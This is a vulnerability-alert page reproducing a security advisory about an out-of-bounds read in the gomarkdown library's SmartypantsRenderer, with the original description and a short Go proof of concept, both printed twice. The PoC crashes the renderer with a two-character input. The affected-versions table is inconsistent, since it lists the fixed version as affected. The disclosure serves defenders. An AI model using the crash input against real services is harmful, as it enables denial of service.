Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.5
Go Markdown can crash when processing certain text inputs
GHSA-77fj-vx54-gvh7
Summary
A specific type of text input can cause the Go Markdown library to crash or behave unexpectedly. This can affect websites and applications that use Go Markdown to render text. To protect against this, update to the latest version of the library or modify your code to handle this specific scenario.
What to do
- Update github.com gomarkdown to version 0.0.0-20260411013819-759bbc3e3207.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | gomarkdown | <= 0.0.0-20260411013819-759bbc3e3207 | 0.0.0-20260411013819-759bbc3e3207 |
Original title
Go Markdown has an Out-of-bounds Read in SmartypantsRenderer
Original description
### Summary
Processing a malformed input containing a `<` character that is not followed by a `>` character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.
### Details
The `smartLeftAngle()` function in `html/smartypants.go:367-376` performs an out-of-bounds slice operation when processing a `<` character that is not followed by a `>` character anywhere in the remaining text.
https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376
If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.
### PoC
```golang
package main
import (
"bytes"
"fmt"
"github.com/gomarkdown/markdown/html"
)
func main() {
src := []byte("<a")
fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src))
var buf bytes.Buffer
sp := html.NewSmartypantsRenderer(html.Smartypants)
sp.Process(&buf, src) // panics: slice bounds out of range
fmt.Printf("Output: %q\n", buf.String())
}
```
### Impact
This vulnerability will lead to a Denial of Service / panic on the processing service.
-- The Datadog Security Team
Processing a malformed input containing a `<` character that is not followed by a `>` character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.
### Details
The `smartLeftAngle()` function in `html/smartypants.go:367-376` performs an out-of-bounds slice operation when processing a `<` character that is not followed by a `>` character anywhere in the remaining text.
https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376
If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.
### PoC
```golang
package main
import (
"bytes"
"fmt"
"github.com/gomarkdown/markdown/html"
)
func main() {
src := []byte("<a")
fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src))
var buf bytes.Buffer
sp := html.NewSmartypantsRenderer(html.Smartypants)
sp.Process(&buf, src) // panics: slice bounds out of range
fmt.Printf("Output: %q\n", buf.String())
}
```
### Impact
This vulnerability will lead to a Denial of Service / panic on the processing service.
-- The Datadog Security Team
ghsa CVSS3.1
7.5
Vulnerability type
CWE-125
Out-of-bounds Read
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026